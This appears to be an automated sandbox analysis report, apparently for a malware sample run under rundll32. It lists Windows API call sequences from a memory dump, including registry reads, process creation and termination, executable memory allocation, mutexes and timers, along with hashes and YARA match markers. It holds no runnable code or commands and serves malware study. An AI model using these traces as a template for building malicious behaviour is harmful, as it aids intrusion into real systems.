• API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
• String ID:
• API String ID: 1719504581-0
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,?), ref: 0628D237
• GetLastError.KERNEL32 ref: 0628D25D
• SetEvent.KERNEL32(00000000), ref: 0628D270
• GetModuleHandleA.KERNEL32(00000000), ref: 0628D2B9
• memset.NTDLL ref: 0628D2CE
• RtlExitUserThread.NTDLL(?), ref: 0628D303
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: HandleModule$ErrorEventExitLastThreadUsermemset
• String ID:
• API String ID: 3978817377-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
  • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
• lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EB0D
  • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
  • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
  • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
  • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
  • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
  • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
  • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
  • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
• PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0627EB2E
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EB5A
  • Part of subcall function 0628BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
  • Part of subcall function 0628BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
  • Part of subcall function 0628BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
  • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
  • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
  • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BCB9
  • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
  • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
• LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0627EB77
• WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0627EB98
• PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EBAD
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
• String ID:
• API String ID: 2670873185-0
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005,?,00000000), ref: 0628EFBB
• lstrlen.KERNEL32(00000000,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005), ref: 0628EFD1
• lstrlen.KERNEL32(?,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005), ref: 0628EFE6
• RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0628F04B
• _snprintf.NTDLL ref: 0628F071
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0628F090
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: lstrlen$Heap$AllocateFree_snprintf
• String ID:
• API String ID: 3180502281-0
Uniqueness Score: -1.00%

APIs
• OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
• CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
• GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
  • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
  • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
  • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
  • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
• GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
• SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
• String ID:
• API String ID: 1835239314-0

APIs
• StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,06287C35,00000000,?,?,?), ref: 0627F531
• StrChrA.SHLWAPI(00000001,00000020,?,?,?,06287C35,00000000,?,?,?), ref: 0627F542
  • Part of subcall function 06271F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,06283D4E,00000000,?,?,00000000,00000001), ref: 06271F21
  • Part of subcall function 06271F0F: StrChrA.SHLWAPI(?,0000000D,?,06283D4E,00000000,?,?,00000000,00000001), ref: 06271F59
• RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0627F582
• memcpy.NTDLL(00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5AF
• memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5BE
• memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5D0
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: memcpy$AllocateHeaplstrlen
• String ID:
• API String ID: 1819133394-0

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 062904D9
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 062904EA
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 06290505
• GetLastError.KERNEL32 ref: 0629051B
• HeapFree.KERNEL32(00000000,?), ref: 0629052D
• HeapFree.KERNEL32(00000000,?), ref: 06290542
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
• String ID:
• API String ID: 1822509305-0

APIs
• OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0628C917
• _strupr.NTDLL ref: 0628C952
• lstrlen.KERNEL32(00000000), ref: 0628C95A
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0628C999
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0628C9A0
• GetLastError.KERNEL32 ref: 0628C9A8
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
• String ID:
• API String ID: 110452925-0

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0628B567
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0628B595
• RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628B5A7
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0628B5CC
• HeapFree.KERNEL32(00000000,00000000), ref: 0628B5E7
• RegCloseKey.ADVAPI32(?), ref: 0628B5F1
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: HeapQueryValue$AllocateCloseFreeOpen
• String ID:
• API String ID: 170146033-0

APIs
• lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5F8
• lstrlen.KERNEL32(?,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5FF
• RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0627A611
• _snprintf.NTDLL ref: 0627A637
  • Part of subcall function 0628C01F: memset.NTDLL ref: 0628C034
  • Part of subcall function 0628C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
  • Part of subcall function 0628C01F: wcstombs.NTDLL ref: 0628C077
  • Part of subcall function 0628C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
  • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
  • Part of subcall function 0628C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
  • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
  • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C131
  • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C136
• _snprintf.NTDLL ref: 0627A66B
  • Part of subcall function 0628C01F: GetLastError.KERNEL32 ref: 0628C102
  • Part of subcall function 0628C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0628C122
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0627A688
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
• String ID:
• API String ID: 1481739438-0

APIs
• lstrlen.KERNEL32(0627261E,00000000,00000000,00000008,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F7A7
• RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0628F7BA
• lstrcpy.KERNEL32(00000008,0627261E), ref: 0628F7DC
• GetLastError.KERNEL32(06274A0A,00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F805
• HeapFree.KERNEL32(00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F81D
• CloseHandle.KERNEL32(00000000,06274A0A,00000000,00000000,?,0627261E,0627988B,00000000,?), ref: 0628F826
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
• String ID:
• API String ID: 2860611006-0

APIs
• GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
  • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
• GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
• GetCurrentThreadId.KERNEL32 ref: 062850C4
• GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
• GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
• lstrcpy.KERNEL32(00000000), ref: 06285100
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
• String ID:
• API String ID: 1175089793-0

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 06274FB8
• lstrlen.KERNEL32(?,?), ref: 06274FE9
• memcpy.NTDLL(00000008,?,00000001), ref: 06274FF8
• HeapFree.KERNEL32(00000000,00000000,?), ref: 0627507A
Strings
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrlenmemcpy
• String ID: W
• API String ID: 379260646-655174618

APIs
• memset.NTDLL ref: 06285A17
• FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 06285A84
• GetLastError.KERNEL32(?,00000000,00000000), ref: 06285A8E
Strings
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: BuffersErrorFileFlushLastmemset
• String ID: K$P
• API String ID: 3817869962-420285281

APIs
• memcpy.NTDLL(?,0627DE40,00000000,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D121
• lstrlen.KERNEL32(0627DE40,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D13F
• memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0627D1AE
• lstrlen.KERNEL32(0627DE40,00000000,00000000,?,?,?,0627DE40,?,?,?,?,?), ref: 0627D1CF
• lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0627D1E3
• memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0627D1EC
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0627D1FA
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: lstrlenmemcpy$FreeLocal
• String ID:
• API String ID: 1123625124-0

APIs
  • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,06272028,?), ref: 0627867A
  • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,06272028,?), ref: 06278697
• lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 06272055
• lstrlenW.KERNEL32(00000008,?,?,?), ref: 0627205C
• lstrlenW.KERNEL32(?,?,?,?,?), ref: 0627207A
• lstrlen.KERNEL32(00000000,?,00000000), ref: 06272138
• lstrlenW.KERNEL32(?), ref: 06272143
• wsprintfA.USER32 ref: 06272185
  • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
  • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
  • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
  • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
  • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
  • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
  • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
  • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
  • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
  • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Yara matches
Similarity
• API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
• String ID:
• API String ID: 1727939831-0
                                                          • Opcode ID: ad3aa6dfbe91be556d82e8251a49608bbb460e4cd560b88302dd634816bc4b39
                                                          • Instruction ID: 4d6f6938bc097f6e9cfa869f8e2ed95fd5ff35d227622a4dd073f49c8f775652
                                                          • Opcode Fuzzy Hash: ad3aa6dfbe91be556d82e8251a49608bbb460e4cd560b88302dd634816bc4b39
                                                          • Instruction Fuzzy Hash: 0A514E7191020AEFDF81EFA9DC48DAE7BBAFF88204B054025ED24A7211DB35DA11DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000), ref: 06277E46
                                                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 06277ED9
                                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 06277F31
                                                          • GetLastError.KERNEL32 ref: 06277F63
                                                          • GetLastError.KERNEL32 ref: 06277F77
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000,?,06273EC6,?), ref: 06277F8C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$memcpy
                                                          • String ID:
                                                          • API String ID: 2760375183-0
                                                          • Opcode ID: 8bdb2d859482c0eebfd7fbfa9fc49a98c8e556825a73b26a15cb3456b78610ea
                                                          • Instruction ID: 7434599d2a848878770da6d38e5c913c908baf461c2f5229b8724dbb6e4c0fdd
                                                          • Opcode Fuzzy Hash: 8bdb2d859482c0eebfd7fbfa9fc49a98c8e556825a73b26a15cb3456b78610ea
                                                          • Instruction Fuzzy Hash: C15168B1920209AFEB50DFA5DC88EAEBBB9EB48354F108429FD14E6240D3748A54CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(?,00000020), ref: 0628AEF4
                                                          • lstrcat.KERNEL32(?,00000020), ref: 0628AF09
                                                          • lstrcmp.KERNEL32(00000000,?), ref: 0628AF20
                                                          • lstrlen.KERNEL32(?), ref: 0628AF44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 17547d52646efbb4a4bde35406953668589fa7bdad2b4fb8557b4d73791e4221
                                                          • Instruction ID: 91ea27631277b7f635887082123d0f67b92f7a605810c7453c7195027637878f
                                                          • Opcode Fuzzy Hash: 17547d52646efbb4a4bde35406953668589fa7bdad2b4fb8557b4d73791e4221
                                                          • Instruction Fuzzy Hash: 3B51E471E11209EFDF51EF99CC846ADBBB6EF64314F048467EC159B281CB71AA41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5A3
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5B4
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5C6
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5D8
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5EA
                                                          • lstrlenW.KERNEL32(?,06293D54,06899A2B,00000057), ref: 0627D5F6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: 9fdb5c3bf7d6da7260adbbd1dbad591776164470898e93d350912805fee546bb
                                                          • Instruction ID: 59763e4109bb807ad5f78595756851bd5c797f55641192ac486e91268053794f
                                                          • Opcode Fuzzy Hash: 9fdb5c3bf7d6da7260adbbd1dbad591776164470898e93d350912805fee546bb
                                                          • Instruction Fuzzy Hash: 05412D71E2060BAFDB50DFA9D880E6EB7F9FF88204B14896DD955E7200D774EA448B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062824C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 062824CF
                                                            • Part of subcall function 062824C3: SetLastError.KERNEL32(000000B7,?,06285C3C,?,?,00000000,?,?,?), ref: 062824E0
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 06285C5C
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D34
                                                            • Part of subcall function 0627A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
                                                            • Part of subcall function 0627A976: CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
                                                            • Part of subcall function 0627A976: GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
                                                            • Part of subcall function 0627A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
                                                            • Part of subcall function 0627A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
                                                            • Part of subcall function 0627A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 06285D1D
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D26
                                                            • Part of subcall function 062824C3: CreateMutexA.KERNEL32(0629A1E8,00000000,?,?,06285C3C,?,?,00000000,?,?,?), ref: 062824F3
                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 06285D41
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                          • String ID:
                                                          • API String ID: 1700416623-0
                                                          • Opcode ID: 087f69d7ab176384251ad503badebecee14e07c8755183b24e879d42eed2e0d1
                                                          • Instruction ID: cd466cd155160b38fd9427f2cbb1645c28f2ae0f8db13e2a8371780e6ea6805b
                                                          • Opcode Fuzzy Hash: 087f69d7ab176384251ad503badebecee14e07c8755183b24e879d42eed2e0d1
                                                          • Instruction Fuzzy Hash: DE319075A213059FCB81BF74EC4CD6E7BBAEBC92107244825EE16EB290E6318800CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 0628C228
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,062789E4,00000000), ref: 0628C26A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0628C2BC
                                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,062789E4,00000000), ref: 0628C2D5
                                                            • Part of subcall function 0627E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0627EA0D
                                                            • Part of subcall function 0627E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0628C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0627EA50
                                                          • GetLastError.KERNEL32(?,00000000,062789E4,00000000,?,?,?,?,?,?,?,06279100,?), ref: 0628C30D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                          • String ID:
                                                          • API String ID: 1921436656-0
                                                          • Opcode ID: 020bf3aea8778c235151b867b0669c7f284a7238123e88afe2a7b8353a7657cd
                                                          • Instruction ID: edbc3df33f069e2445b29a0fae5b872b94c5234b1b80ce7c888dfabc2d0fe873
                                                          • Opcode Fuzzy Hash: 020bf3aea8778c235151b867b0669c7f284a7238123e88afe2a7b8353a7657cd
                                                          • Instruction Fuzzy Hash: 8D313971E21305AFDF91EFA5DC45AAEBBB5EB48750F000066EE05A7280D7749A45CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0627A078
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627A091
                                                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0627A09E
                                                          • lstrlen.KERNEL32(0629B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0627A0B0
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0627A0E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
